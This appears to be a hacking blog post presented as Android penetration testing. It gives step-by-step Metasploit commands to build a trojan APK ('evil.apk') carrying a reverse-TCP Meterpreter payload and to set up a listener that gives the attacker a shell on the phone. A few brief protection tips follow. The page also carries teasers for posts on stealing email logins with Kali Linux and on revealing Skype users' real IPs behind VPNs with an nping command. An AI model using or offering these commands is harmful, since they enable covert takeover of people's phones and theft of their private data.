Android Penetration Testing Using Metasploit Framework

By -
Android devices have become quiet Ubiquitous and the usage is increasing with every passing second . And so is the Dependency on these Android Devices . Though the security of the Android Devices has always been questionable . We all have lots of private data on our Android Devices . Hence Penetration Testing Android Devices comes as an interesting topic to me . In this post I will show you how to Penetration Test any Android Device using just the Metasploit Framework on your Kali Linux.

Android is Linux based and generally has a .apk format whose contents can be seen by unzipping with Winrar  . APK stands for Android Application package file and is used for distributing and installing the applications on Android Devices  .

Android Penetration testing With Metasploit

Requirements :
  • Metasploit Framework .
  • Android Smart Phone or an Android Emulator .
Step 1 : Create a malicious APK file : Metasploit ships in with everything you need to create a malicious apk file .
Command : msfpayload android/meterpreter/reverse_tcp LHOST=<YOUR-IP> LPORT=443 R > evil.apk
Explaination : This command basically creates a reverse TCP payload (the victim will establish a reverse connection to the Attacker over TCP on the specified IP and the Port Number) .
Step 2  : Setup a Listener : Since we just created a malicious android application that will establish a reverse TCP connection , at the attacker side we need to set up a metasploit listener that will be here to accept the connection .
Command :
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST <YOUR-IP>
set LPORT 443
exploit
Multi/Handler is a stub that is able to handle the connect backs of almost all metasploit payloads . With the above commands , we just set up a ” listner ” for the metasploit generated malicious application(evil.apk) to connect back to the attacker . It is here we expect to get a Meterpreter Shell if all went Right .
Now All is Set !! All one needs to do is to install and start the malicious application the an android device or an emulator and see what all fruitfull information we can get from this application .android_hack5

How to Protect your Android Device :

  • Don’t install APK’s from the unknown source.
  • Make sure you have the Install Applications From Unknown Source Options in the Settings menu disabled .
  • Use a Good Antivirus Protection vendor .

Comments

Post a Comment

Popular posts from this blog

HACK EMAIL-ID,USERNAME AND PASSWORD OR ANY USER DETAILS BY USING KALI LINUX.

By -
Image
HACK EMAIL-ID,USERNAME AND PASSWORD OR ANY USER DETAILS BY USING  KALI LINUX . Today,i am going to show you how you can get email-id,username and password or any user details you want by using  KALI LINUX . STEPS FOR SETTING UP YOUR SYSTEM. Download Kali Linux from   here . Extract the contents of Kali Linux iso file which you  downloaded in step and copy it to pendrive or instead of pendrive burn the iso file in cd if you want to make a cd of it. After copying all contents to pendrive or burning the iso file in cd,reboot you system,press F8 on boot-time and select boot from pendrive if you have copied all the files in pendrive,else boot from cd-rom if you burn the iso file in cd. After selecting the boot from device,the kali installation window will open,install accordingly as per your requirement. NOTE:During installation,in mount point of selected installation drive,set mount point to  "/" . Remember the username and password while installation as this will
Read more

Port Fail Vulnerability : Critical VPN Vulnerability

By -
Image
Port Fail Vulnerability : Critical VPN Vulnerability How Port Fail Vulnerability Exposes your REAL IP on SKYPE Using Port Fail Vulnerability it’s possible to disclose the real IP of a Skype accounts you’re interested in. There are a bunch of Skype IP resolvers which can give you the VPN IP address and port number of a Skype user using only their Skype login. Then you need to use the same thing a copyright monitoring company would use — send some UDP packets to the whole internet on the exact port. It’s remarkable but Skype will send you a reply for almost any data! The nping utility from  nmap  package suits our needs very well: # nping --udp -p 13318 --data-string 'hellothere!' -c 1 serv.valdikss.org.ru Starting Nping 0.7.00 ( https://nmap.org/nping ) at 2015-12-20 19:54 MSK SENT (0.0157s) UDP 195.154.127.59:53 > 92.42.31.8:13318 ttl=64 id=10802 iplen=39  RCVD (0.0859s) UDP 185.61.149.121:4272 > 195.154.127.59:53 ttl=54 id=1534 iplen=32    Max rtt: N/A | M
Read more